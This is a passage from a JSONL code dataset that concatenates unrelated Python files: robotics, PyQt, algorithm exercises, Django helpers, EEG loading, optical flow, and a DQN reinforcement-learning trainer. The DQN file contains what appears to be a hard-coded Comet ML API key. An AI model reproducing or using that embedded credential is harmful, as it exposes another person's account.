1\n\t\t\t\t\tdriveMotors(0,0)\n\t\t\t\t\t\n\t\ttime.sleep(2)\n\t\t\t\nexcept KeyboardInterrupt:\n\tprint('Stopped!')\n\tdriveMotors(0,0)\n\t\t\t\n\t\n\n#decompose into left and right wheel velocities\n","sub_path":"SlamBot-modified-goaltracking/Core/encoder_drive/drive_square_flipped.py","file_name":"drive_square_flipped.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"189335254","text":"from PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom utils.sim import sim\nfrom main import MainWindow\nimport time\nimport csv\n\n# Inherits from the QThread class\nclass BigWorkThread(QThread):\n\n finishSignal = pyqtSignal(str)\n updateSignal = pyqtSignal(list)\n\n def __init__(self, workDistance, k, radian, wavelength,parent=None):\n super(BigWorkThread, self).__init__(parent)\n self.workDistance = workDistance\n self.k = k\n self.wavelength = wavelength\n self.radian = radian\n self.path = './data/'\n self.writeData = []\n\n\n def run(self):\n\n if self.k == 
0.0 or self.radian == 0.0:\n QMessageBox.information(self, \"warning\", \"Please set the value of Radian or K\")\n else:\n while self.workDistance <= 10:\n simTest = sim(k=self.k, radian=self.radian, wavelength=632.8)\n\n startPoint = int(self.workDistance * 10000)\n self.I0, self.I = simTest.simluation(startPoint)\n self.writeData.append(self.I)\n\n if self.workDistance > 10:\n self.workDistance = 0\n else:\n self.workDistance += 0.1\n time.sleep(0.1)\n self.updateSignal.emit([self.I0, self.I, self.workDistance])\n\n self.finishSignal.emit(\"Finish\")\n self.save_data()\n self.workDistance = 0\n\n def save_data(self):\n\n f = open('./data/data_%f.csv' % 0.01, 'w')\n #with open('./data/data_%f.csv' % self.radian) as f:\n writer = csv.writer(f)\n for data in self.writeData:\n writer.writerow(data)\n f.close()\n\n f = open('./data/I0_data_%f.csv' % 0.01, 'w', newline='')\n # with open('./data/data_%f.csv' % self.radian) as f:\n writer = csv.writer(f)\n writer.writerow(self.I0)\n f.close()\n\n\n\n\n","sub_path":"tread.py","file_name":"tread.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"149577330","text":"class Solution(object):\n def permuteUnique(self, nums):\n res = []\n nums = sorted(nums)\n self.helper(nums, res, [],0)\n print(res)\n return res\n def helper(self, nums, res, sub,index):\n # print(nums,sub, index)\n if sub :\n res.append(sub)\n for i in range(index,len(nums)):\n print(\"helper\")\n print(nums, res, sub+[nums[i]],i+1)\n self.helper(nums,res,sub+[nums[i]], i + 1)\nnums = [1,1,2,2,3]\nnums = [1,2,3]\nx = Solution().permuteUnique(nums)","sub_path":"permutation2.py","file_name":"permutation2.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"248599972","text":"import sys\nfrom math import ceil, log2\nfrom bisect import bisect_right\nsys.setrecursionlimit(10**9)\nsys.stdin = open(\"7469_K번째 수.txt\", \"rt\")\n\n\nclass MergeSortTree:\n def __init__(self, data):\n self.data = data\n self.data_len = len(data)\n self.tree_height = int(ceil(log2(self.data_len)))\n self.tree = [[]] * (1 << (self.tree_height + 1))\n\n def build(self, node, left, right):\n if left == right:\n self.tree[node] = [self.data[left]]\n return self.tree[node]\n\n mid = (left + right) // 2\n left_arr = self.build(2 * node, left, mid)\n right_arr = self.build(2 * node + 1, mid + 1, right)\n self.tree[node] = self._merge(left_arr, right_arr)\n return self.tree[node]\n\n def _merge(self, left_arr, right_arr):\n merged_arr = []\n i, j = 0, 0\n while i < len(left_arr) and j < len(right_arr):\n if left_arr[i] <= right_arr[j]:\n merged_arr.append(left_arr[i])\n i += 1\n else:\n merged_arr.append(right_arr[j])\n j += 1\n while i < len(left_arr):\n merged_arr.append(left_arr[i])\n i += 1\n while j < len(right_arr):\n merged_arr.append(right_arr[j])\n j += 1\n return merged_arr\n\n def query(self, target, node, left, right, start, end):\n if start <= left and right <= end:\n return bisect_right(self.tree[node], target)\n if end < left or right < start:\n return 0\n mid = (left + right) // 2\n return self.query(target, 2*node, left, mid, start, end) + self.query(target, 2*node+1, mid+1, right, start, end)\n\n\ndef solution(n, m, arr, Q):\n tree = MergeSortTree(arr)\n tree.build(1, 0, n-1)\n for i, j, k in Q:\n left, right = int(-1e9), int(1e9)\n while left <= right:\n mid = (left + right) // 2\n cnt = tree.query(mid, 1, 0, 
n-1, i-1, j-1)\n if cnt < k:\n left = mid + 1\n else:\n right = mid - 1\n print(left)\n\n\nif __name__ == \"__main__\":\n input = sys.stdin.readline\n n, m = map(int, input().split())\n arr = list(map(int, input().split()))\n Q = [list(map(int, input().split())) for _ in range(m)]\n solution(n, m, arr, Q)\n\n","sub_path":"BaekJoon/단계별로 풀어보기/세그먼트 트리/7469_K번째 수.py","file_name":"7469_K번째 수.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"558738930","text":"from __future__ import division\n\ndef func(x, y):\n return 2 * (x**2 + y)\n\ndef main():\n h = 0.1\n x = 0\n y = 1\n n = 10\n for i in range(0, n):\n ytilda = y + ((x + h) - x) * func(x, y)\n y = y + (((x + h) - x) * (func(x, y) + func(x + h, ytilda)))/(2)\n x = x + h\n print(i)\n print('x is ', x)\n print('y is ', y)\nmain()","sub_path":"10/AylerPerech.py","file_name":"AylerPerech.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"168491390","text":"# coding: utf-8\n\n\ndef get_sort_field(request):\n \"\"\"\n Retrieve field used for sorting a queryset\n\n :param request: HTTP request\n :return: the sorted field name, prefixed with \"-\" if ordering is descending\n \"\"\"\n sort_direction = request.GET.get('dir')\n field_name = (request.GET.get('sort') or '') if sort_direction else ''\n sort_sign = '-' if sort_direction == 'desc' else ''\n result_field = \"{sign}{field}\".format(sign=sort_sign, field=field_name)\n return result_field\n","sub_path":"webstack_django_sorting/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"587146433","text":"import pandas as pd\nimport numpy as np\nimport utilities.utils as utils\n\ndef col_names(balls):\n cols=['target','action','birdX', 'birdY']\n for i in range(0,balls):\n cols.append('ball'+str(i+1)+'X')\n cols.append('ball'+str(i+1)+'Y')\n print(\"Game cols length:\", len(cols))\n return cols\n\ndef load_data(drive, load_eeg, load_state, params):\n print(\"---Loading---\")\n\n # Load EEG data\n eeg_df = pd.read_csv(load_eeg+\".txt\", header=None, index_col=None)\n print(\"EEG raw shape:\", eeg_df.shape)\n\n # Load game data\n cols = col_names(balls=35) # target, action, birdX, birdY, 35*ballX, 35*Bally\n game_df = pd.read_csv(load_state, names=cols,header=None, index_col=None)\n print(\"Game state shape:\", game_df.shape)\n\n # Seperate EEG util and channel data\n eeg_utils = eeg_df.iloc[:,[0,8]].values\n eeg_df = eeg_df.drop([0,5,6,7,8], axis=1)\n eeg = eeg_df.values\n print(\"EEG Shapes:\", eeg.shape, eeg_utils.shape)\n\n # Extract game state and targets\n game_state = game_df.values\n game_tar = pd.get_dummies(game_df.iloc[:, 0]).values\n print(\"Game State Shapes:\", game_state.shape)\n\n # Quick check for missing samples\n if len(eeg)%params[-1]: print(\n \"-----SAMPLE RATE DID NOT DIVIDE LENGTH OF EEG DATA!-----\\n\" +\n \"-----MISSING SMAPLES ALERT!-----\")\n # Verbos check for missing samples\n missing_samps, missing_idx = utils.sample_validation(eeg_utils[:,0], params[-1]-1)\n # Fill in missing samples\n if len(missing_idx) > 0:\n for i in range(missing_samps[0]):\n print(eeg_utils[missing_idx[0]+i,0])\n eeg, eeg_utils = utils.sameple_fill(eeg, eeg_utils, missing_samps, missing_idx)\n\n return eeg, eeg_utils, game_state, 
game_tar\n","sub_path":"Pipeline/flappy_load.py","file_name":"flappy_load.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"578354066","text":"from collections import deque\r\nimport sys\r\n\r\ndirs = [(-1, 0), (1, 0), (0, -1), (0, 1)]\r\nq = deque()\r\n\r\ndef dfs(startV: int):\r\n x, y = startV\r\n chk[x][y] = 0\r\n q.append(startV)\r\n\r\n while q:\r\n x, y = q.pop()\r\n \r\n for move in dirs:\r\n moved_x, moved_y = x + move[0], y + move[1]\r\n\r\n if 0 <= moved_x < N and 0 <= moved_y < N:\r\n if chk[moved_x][moved_y] == 1:\r\n q.append((moved_x, moved_y))\r\n chk[moved_x][moved_y] = 0\r\n \r\n\r\nN = int(input())\r\nregion = []\r\n\r\nfor _ in range(N):\r\n region.append(list(map(int, sys.stdin.readline().split())))\r\n\r\nmaxPptn = max(map(max, region))\r\nmax_cnt = 0\r\nfor pptn in range(0, maxPptn):\r\n chk = [[0] * N for _ in range(N)]\r\n\r\n for i in range(N):\r\n for j in range(N):\r\n if region[i][j] - pptn > 0:\r\n chk[i][j] = 1\r\n else:\r\n chk[i][j] = 0\r\n cnt = 0\r\n for i in range(N):\r\n for j in range(N):\r\n if chk[i][j] == 1:\r\n dfs((i, j))\r\n cnt += 1\r\n max_cnt = max(max_cnt, cnt)\r\n\r\nprint(max_cnt)","sub_path":"geonhokim/6.Depth_First_Search/안전영역.py","file_name":"안전영역.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"288975179","text":"# -*- encoding: utf-8 -*-\n#\n# The MIT License (MIT)\n#\n# Copyright (c) 2016-2018 Tobias Koch \n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n\nimport threading\n\nfrom org.boltlinux.repository.debiansources import DebianSources\nfrom org.boltlinux.repository.boltsources import BoltSources\nfrom org.boltlinux.repository.boltpackages import BoltPackages\nfrom org.boltlinux.repository.boltpackagescan import BoltPackageScan\n\nclass RepoUpdater:\n\n def __init__(self, config):\n self._stop_flag = threading.Event()\n self._activate = threading.Event()\n self._condition = threading.Condition()\n\n self._tasks = [\n DebianSources(config),\n BoltSources(config),\n BoltPackages(config),\n BoltPackageScan(config)\n ]\n #end function\n\n def run(self):\n for t in self._tasks:\n t.start()\n\n while not self._stop_flag.is_set():\n for t in self._tasks:\n t.activate()\n while not self._stop_flag.is_set():\n if t.wait_until_done(0.250):\n break\n #end for\n\n with self._condition:\n while not self._stop_flag.is_set():\n if self._condition.wait_for(self._activate.is_set, 0.250):\n break\n self._activate.clear()\n #end with\n #end while\n\n for t in self._tasks:\n t.stop()\n for t in self._tasks:\n t.join()\n #end function\n\n def activate(self, *args):\n with self._condition:\n self._activate.set()\n\n def stop(self, *args):\n self._stop_flag.set()\n\n#end class\n","sub_path":"lib/org/boltlinux/repository/repoupdater.py","file_name":"repoupdater.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"192596858","text":"# Problem 22\n# ==========\n\n\n# Using [1]names.txt, a 46K text file containing over five-thousand first\n# names, begin by sorting it into alphabetical order. Then working out the\n# alphabetical value for each name, multiply this value by its alphabetical\n# position in the list to obtain a name score.\n\n# For example, when the list is sorted into alphabetical order, COLIN, which\n# is worth 3 + 15 + 12 + 9 + 14 = 53, is the 938th name in the list. 
So,\n# COLIN would obtain a score of 938 x 53 = 49714.\n\n# What is the total of all the name scores in the file?\n\n\n# Answer: 871198282 calculated in 0.156455039978 seconds\n\nfrom euler import runtime\nfrom string import ascii_uppercase\n\n\ndef score_names(file, s=0):\n value = {c: ascii_uppercase.index(c) + 1 for c in ascii_uppercase}\n with open(file, 'r') as f:\n names = sorted(f.read().replace('\"', '').split(','))\n for name in names:\n score = 0\n for char in name:\n score += value[char]\n score *= names.index(name) + 1\n s += score\n return s\n\nruntime(score_names, 'txt/names.txt')\n","sub_path":"solutions/022.py","file_name":"022.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"3824134","text":"from django.conf.urls import url\n\nfrom .views import (HttpCheckCreateView, HttpCheckUpdateView,\n duplicate_http_check)\n\nurlpatterns = [\n\n url(r'^httpcheck/create/', \n view=HttpCheckCreateView.as_view(),\n name='create-http-check'),\n\n url(r'^httpcheck/update/(?P\\d+)/',\n view=HttpCheckUpdateView.as_view(), \n name='update-http-check'),\n\n url(r'^httpcheck/duplicate/(?P\\d+)/',\n view=duplicate_http_check, \n name='duplicate-http-check'),\n]\n\n\n","sub_path":"cabot_check_http/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"116787637","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"artist\", views.artist, name='artist'),\n path(\"artist/\", views.oneartist, name='artist'),\n path('album/', views.album, name='album'),\n path('album/', views.onealbum, name='album'),\n path('profile/', views.profile, name=\"profile\"),\n path('addsong', views.addsong, name=\"addsong\")\n]\n","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"193129779","text":"#!/usr/bin/env python3\n\n#Author: Marta CICCARELLA\n#Univeristé Paris Diderot\n#Projet court: Septembre\n\n\n#import libraries\nimport numpy as np\n\n\n# define seq \n#seq = [\"H\", \"H\", \"P\", \"H\", \"P\", \"P\", \"H\"].\nseq = [\"a\", \"b\", \"c\", \"d\", \"e\"]\nprint(\"My sequence is:\", seq)\n\n# create a matrix\nside = 2*(len(seq))\nmatrix = np.chararray((side, side))\nmatrix[:] = ' '\n\n#integrate the sequence in the matrix \ni = int(side/2)\nj = int(side/2)\n\nfor k in range(0, len(seq)):\n matrix[i, j] = seq[k] \n j = j+1\n\nprint(matrix) \n\n#define a function that ckecks \n#if positions are available for each move \n#before moving\n\ndef move_right(i, j, matrix):\n if matrix[i, j+1] == '':\n i1 = i \n j1 = j+1\n return(i1, j1)\n else:\n return(i, j)\n\ndef move_left(i, j, matrix):\n if matrix[i, j-1] == '':\n i1 = i \n j1 = j-1\n return(i1, j1)\n else:\n return(i, j) \n\ndef move_up(i, j, matrix):\n if matrix[i+1, j] == '':\n i1 = i+1\n j1 = j\n return(i1, j1)\n else:\n return(i, j) \n\ndef move_down(i, j, matrix):\n if matrix[i-1, j] == '':\n i1 = i-1\n j1 = j\n return(i1, j1)\n else:\n return(i, j) \n\n#### define fold function\n\ndef fold(i, j):\n move = np.random.randint(4)\n if move == 0:\n i1, j1 = move_right(i, j, 
matrix)\n if (i1, j1) == (i, j):\n return fold(i, j)\n \n elif move == 1:\n i1, j1 = move_left(i, j, matrix)\n if (i1, j1) == (i, j):\n return fold(i, j)\n \n elif move == 2:\n i1, j1 = move_up(i, j, matrix)\n if (i1, j1) == (i, j):\n return fold(i, j)\n \n elif move == 3:\n i1, j1 = move_down(i, j, matrix)\n if (i1, j1) == (i, j):\n return fold(i, j)\n \n return(i1, j1)\n\nmatrix = np.chararray((side, side)) #reinitialize the matrix\nmatrix[:] = ' '\ni = int(side/2)\nj = int(side/2)\n#matrix[i, j] = seq[0] #start the sequence in the middle of the matrix\n\n#------fold one by one to check---------\n#i, j = fold(i, j)\n#matrix[i, j] = seq[1]\n\n#i, j = fold(i, j)\n#matrix[i, j] = seq[2]\n\n#i, j = fold(i, j)\n#matrix[i, j] = seq[3]\n\n#i, j = fold(i, j)\n#matrix[i, j] = seq[4]\n#----------------------------------------\n\n#fold the sequence in the matrix\nfor k in range(0, len(seq)):\n i, j = fold(i, j) \n matrix[i, j] = seq[k]\n print(i, j)\n\nprint(matrix)\n\n","sub_path":"code/second_attempt/code_mardi_2.py","file_name":"code_mardi_2.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"119411379","text":"from PIL import Image, ImageDraw\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nfrom scipy import signal\nimport numpy.linalg as lin\n\n\ndef boxfilter(n):\n assert (n%2 != 0),\"Dimension must be odd\"\n a = np.empty((n, n))\n a.fill(1/(n*n))\n return a\n\ndef gauss1d(sigma):\n arr_length = 6.0*sigma # keep as float so .is_integer() below is valid\n if arr_length % 2 == 0:\n val = ((arr_length)/2)+1\n elif arr_length.is_integer() == False:\n arr_length = np.ceil(arr_length)\n val = (arr_length + 1)/2\n if arr_length % 2 == 0:\n arr_length = arr_length + 1\n val = arr_length - 1\n elif arr_length % 2 != 0:\n val = (arr_length + 1)/2\n lst = list(range(int(val)))\n neg_lst = [-x for x in lst]\n neg_lst.remove(0)\n neg_lst.reverse()\n a_val = neg_lst + lst\n a_val = [math.exp(- (abs(x)*abs(x)) / (2*sigma*sigma)) for x in a_val]\n sum_aval = sum(a_val)\n a_aval = [(1/sum_aval)*x for x in a_val]\n return np.asarray(a_aval)\n\ndef gauss2d(sigma):\n f = gauss1d(sigma)\n return signal.convolve2d(f[np.newaxis], np.transpose(f[np.newaxis]))\n\ndef gaussconvolve2d(array,sigma):\n assert (array.ndim == 2),\"Array must be 2D\"\n filter = gauss2d(sigma)\n result = signal.convolve2d(array, filter, 'same')\n return result\n\n\n\ndef boxconvolve2d(image, n):\n filter = boxfilter(n)\n result = signal.convolve2d(image, filter, 'same')\n return result\n\ndef Estimate_Derivatives(im1, im2, sigma=1.5, n=3):\n \n im1_smoothed = gaussconvolve2d(im1,sigma)\n Ix, Iy = np.gradient(im1_smoothed)\n It = boxconvolve2d(im1, n) - boxconvolve2d(im2, n)\n return Ix, Iy, It\n\ndef Optical_Flow(im1, im2, x, y, window_size, sigma=1.5, n=3):\n assert((window_size % 2) == 1) , \"Window size must be odd\"\n Ix, Iy, It = Estimate_Derivatives(im1, im2, sigma, n)\n half = int(np.floor(window_size/2)) # cast to int so the slices below are valid in Python 3\n\n win_Ix = Ix[y-half-1:y+half, x-half-1:x+half].T.flatten()\n\n win_Iy = Iy[y-half-1:y+half, x-half-1:x+half].T.flatten()\n win_It = It[y-half-1:y+half, x-half-1:x+half].T.flatten()\n A = np.vstack([win_Ix, win_Iy])\n V = np.dot((-1)*win_It,np.dot(lin.pinv(np.dot(A.T,A)), A.T))\n\n return V[1], V[0]\n\ndef AppendImages(im1, im2):\n\n im1cols, im1rows = im1.size\n im2cols, im2rows = im2.size\n im3 = Image.new('RGB', (im1cols+im2cols, max(im1rows,im2rows)))\n im3.paste(im1,(0,0))\n im3.paste(im2,(im1cols,0))\n return im3\n\ndef DisplayFlow(im1, im2, x, y, uarr, varr):\n\n 
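# NOTE: im3 places im1 and im2 side by side; each (u, v) pair in (uarr, varr) is one\n # frame-to-frame displacement, so the red polyline drawn below is the running sum of\n # displacements starting from (x + uarr[0], y + varr[0]) on the right-hand image, and\n # the final yellow segment links the original point (x, y) in im1 to the track's end.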
im3 = AppendImages(im1,im2)\n offset = im1.size[0]\n draw = ImageDraw.Draw(im3)\n xinit = x+uarr[0]\n yinit = y+varr[0]\n for u,v,ind in zip(uarr[1:], varr[1:], range(1, len(uarr))):\n draw.line((offset+xinit, yinit, offset+xinit+u, yinit+v),fill=\"red\",width=2)\n xinit += u\n yinit += v\n draw.line((x, y, offset+xinit, yinit), fill=\"yellow\", width=2)\n im3.show()\n del draw\n return im3\n\ndef HitContinue(Prompt='Hit any key to continue'):\n input(Prompt)\n\nx=278\ny=277\n\nwindow_size=17\n\n# sigma of the 2D Gaussian (used in the estimation of Ix and Iy)\nsigma=1.5\n\n# size of the boxfilter (used in the estimation of It)\nn = 3\n\n\n# scale factor for display of optical flow (to make result more visible)\nscale=10\n\nPIL_im1 = Image.open('frame07.png')\nPIL_im2 = Image.open('frame08.png')\nim1 = np.asarray(PIL_im1)\nim2 = np.asarray(PIL_im2)\ndx, dy = Optical_Flow(im1, im2, x, y, window_size, sigma, n)\nprint('Optical flow: [', dx, ',', dy, ']')\nplt.imshow(im1, cmap='gray')\nplt.hold(True)\nplt.plot(x,y,'xr')\nplt.plot(x+dx*scale,y+dy*scale, 'dy')\nprint('Close figure window to continue...')\nplt.show()\nuarr = [dx]\nvarr = [dy]\n\nprint('frame 7 to 8')\nDisplayFlow(PIL_im1, PIL_im2, x, y, uarr, varr)\nHitContinue()\n\nprev_im = im2\nxcurr = x+dx\nycurr = y+dy\noffset = PIL_im1.size[0]\n\nfor i in range(8, 14):\n im_i = 'frame%0.2d.png'%(i+1)\n print ('frame', i, 'to', (i+1))\n PIL_im_i = Image.open('%s'%im_i)\n numpy_im_i = np.asarray(PIL_im_i)\n dx, dy = Optical_Flow(prev_im, numpy_im_i, xcurr, ycurr, window_size, sigma, n)\n xcurr += dx\n ycurr += dy\n print(xcurr, ycurr)\n prev_im = numpy_im_i\n uarr.append(dx)\n varr.append(dy)\n #redraw the (growing) figure\n DisplayFlow(PIL_im1, PIL_im_i, x, y, uarr, varr)\n HitContinue()\n\n","sub_path":"assets/code/OPT.py","file_name":"OPT.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"161780271","text":"import numpy as np\nfrom comet_ml import Experiment\nimport torch\nfrom torch_rl.format import default_preprocess_obss\nfrom abc import ABC\nfrom collections import deque\nimport random\nfrom matplotlib import pyplot as plt\nimport math\nimport json, os, csv\nimport torch.nn.functional as F\n\nhyper_params = {\n \"learning_rate\": 0.01\n}\n\nexperiment = Experiment(\"UcVgpp0wPaprHG4w8MFVMgq7j\", project_name=\"navi-corl-2019\")\nexperiment.log_parameters(hyper_params)\n\n\nclass DQNAlgo_new(ABC):\n \"\"\"The class for the DQN\"\"\"\n\n def __init__(self, env, base_model, target_net, num_frames, discount=0.99, lr=0.005, adam_eps=1e-8,\n batch_size=128, preprocess_obss=None, capacity=10000, log_interval=100,\n save_interval=1000, train_interval=500, record_qvals=False, target_update=10):\n\n self.env = env\n self.base_model = base_model\n self.target_model = target_net\n self.base_model.train()\n self.discount = discount\n self.optimizer = torch.optim.SGD(self.base_model.parameters(), lr) #, eps=adam_eps)\n self.batch_size = batch_size\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n self.num_frames = num_frames\n self.preprocess_obss = preprocess_obss or default_preprocess_obss\n self.batch_num = 0\n self.replay_buffer = ReplayBuffer(capacity)\n\n self.episode_success = []\n self.all_rewards = []\n self.losses = []\n self.log_interval = log_interval\n self.save_interval = save_interval\n self.train_interval = train_interval\n self.target_update = target_update\n\n self.curriculum_threshold = 0.5\n\n 
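# NOTE: the epsilon_by_frame schedule defined just below decays the exploration rate\n # exponentially from epsilon_start (1.0) to epsilon_final (0.01) with time constant\n # epsilon_decay (100000 frames), i.e. eps(t) = eps_final + (eps_start - eps_final) * exp(-t / decay).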
self.qvals = []\n self.record_qvals = record_qvals\n\n epsilon_start = 1.0\n epsilon_final = 0.01\n epsilon_decay = 100000\n self.epsilon_by_frame = lambda frame_idx: epsilon_final + (epsilon_start - epsilon_final) \\\n * math.exp(-1. * frame_idx / epsilon_decay)\n\n def update_parameters(self, status, model_dir):\n num_frames = status['num_frames']\n episode_reward = 0\n episode_length = 0\n episode_length_list = []\n self.obs = self.env.reset()\n\n if self.record_qvals:\n orig_obs = self.obs\n experiment.log_metric(\"good_action_for_qvals\", self.env.shortest_path_length()[0])\n np.save(model_dir+\"/orig_obs.npy\", orig_obs)\n self.qvals.append(self.base_model(self.preprocess_obss([orig_obs], device=self.device)))\n\n\n for frame_idx in range(num_frames, self.num_frames):\n with experiment.train():\n\n preprocessed_obs = self.preprocess_obss([self.obs], device=self.device)\n epsilon = self.epsilon_by_frame(frame_idx)\n experiment.log_metric(\"epsilon\", epsilon, step=frame_idx)\n\n action = self.base_model.act(preprocessed_obs, epsilon)\n next_state, reward, done, _ = self.env.step(action)\n\n self.replay_buffer.push(self.obs, action, reward, next_state, done)\n self.obs = next_state\n\n episode_reward += reward\n episode_length += 1\n\n if len(self.replay_buffer) > self.batch_size and frame_idx % self.train_interval == 0:\n loss = self.compute_td_loss()\n self.losses.append(loss.item())\n experiment.log_metric(\"loss\", loss.item(), step=frame_idx)\n\n if self.record_qvals:\n with torch.no_grad():\n qvals = self.base_model(self.preprocess_obss([orig_obs], device=self.device)).cpu().numpy()\n self.qvals.append(qvals)\n qval_dict = {\"BIG_LEFT\": qvals[0][0], \"SMALL_LEFT\": qvals[0][1], \"FORWARD\": qvals[0][2], \"SMALL_RIGHT\": qvals[0][3], \"BIG_RIGHT\": qvals[0][4], }\n experiment.log_metrics(qval_dict, step=frame_idx)\n if done:\n success = 0.0\n if reward >= 2.0:\n success = 1.0\n self.episode_success.append(success)\n experiment.log_metric(\"episode_success_rate\", np.sum(self.episode_success)/len(self.episode_success))\n experiment.log_metric(\"num_episodes_finished\", len(self.episode_success))\n experiment.log_metric(\"episode_length\", episode_length, step=frame_idx)\n\n episode_length_list.append(episode_length)\n episode_length = 0\n\n self.obs = self.env.reset()\n self.all_rewards.append(episode_reward)\n experiment.log_metric(\"episode_reward\", episode_reward, step=frame_idx)\n episode_reward = 0\n\n if len(self.all_rewards) % self.target_update == 0:\n self.target_model.load_state_dict(self.base_model.state_dict())\n\n if len(self.all_rewards) % self.log_interval == 0 and len(self.all_rewards) > 0:\n print(\"Number of Trajectories:\", len(self.all_rewards),\n \"| Number of Frames:\", frame_idx,\n \"| Success Rate:\", np.mean(self.episode_success[-100:]),\n \"| Average Episode Reward:\", np.mean(self.all_rewards[-100:]),\n \"| Losses:\", np.mean(self.losses[-100:]),\n \"| Epsilon:\", epsilon,\n \"| Length of Episode:\", np.mean(episode_length_list[-100:]))\n status[\"num_frames\"] = frame_idx\n\n # # Curriculum learning\n # if np.mean(self.episode_success[-100:]) >= self.curriculum_threshold:\n # print(\"empirical_win_rate: \" + str(np.mean(self.episode_success[-100:])))\n # print(\"Increasing Difficulty by 1!\")\n # status[\"difficulty\"] += 1\n # self.env.set_difficulty(status[\"difficulty\"])\n # print(\"New Difficulty:\", status[\"difficulty\"])\n if len(self.all_rewards) % self.save_interval == 0 and len(self.all_rewards) > 0:\n # Save losses and rewards.\n with 
open(model_dir+'/losses.csv', 'w') as writeFile:\n writer = csv.writer(writeFile)\n writer.writerow(self.losses)\n with open(model_dir+'/rewards.csv', 'w') as writeFile:\n writer = csv.writer(writeFile)\n writer.writerow(self.all_rewards)\n with open(model_dir+'/episode_success.csv', 'w') as writeFile:\n writer = csv.writer(writeFile)\n writer.writerow(self.episode_success)\n\n # Save status\n path = os.path.join(model_dir, \"status.json\")\n with open(path, \"w\") as file:\n json.dump(status, file)\n\n # Saving model\n if torch.cuda.is_available():\n self.base_model.cpu()\n torch.save(self.base_model, model_dir+\"/model.pt\")\n print(\"Done saving model and logs...\")\n if torch.cuda.is_available():\n self.base_model.cuda()\n\n # Save q values if debug mode\n if self.record_qvals:\n with open(model_dir + '/q_vals.csv', 'w') as writeFile:\n writer = csv.writer(writeFile)\n writer.writerow(self.qvals)\n\n if len(self.all_rewards) % self.target_update == 0:\n self.base_model.embed_imgs = []\n self.base_model.embed_gps = []\n with experiment.test():\n obs = self.env.reset()\n spl = self.env.shortest_path_length()\n for action in spl:\n obs = self.preprocess_obss([obs], device=self.device)\n self.base_model.act(obs, 0)\n obs, reward, done, _ = self.env.step(action)\n self.process_embeddings(model_dir)\n\n\n def process_embeddings(self, model_dir):\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n\n if self.base_model.embed_imgs:\n img_means = [img.mean().item() for img in self.base_model.embed_imgs]\n img_medians = [img.median().item() for img in self.base_model.embed_imgs]\n ax.plot(img_means, label=\"img_means\")\n ax.plot(img_medians, label=\"img_medians\")\n\n gps_means = [gps.mean().item() for gps in self.base_model.embed_gps]\n gps_medians = [gps.median().item() for gps in self.base_model.embed_gps]\n ax.plot(gps_means, label=\"gps_means\")\n ax.plot(gps_medians, label=\"gps_medians\")\n plt.legend()\n if not os.path.isdir(model_dir + \"/figs\"):\n os.mkdir(model_dir + \"/figs\")\n plt.savefig(model_dir + \"/figs/embedding_means_\" + str(len(self.episode_success)))\n plt.close()\n\n def compute_td_loss(self):\n\n state, action, reward, next_state, done = self.replay_buffer.sample(self.batch_size)\n\n obs 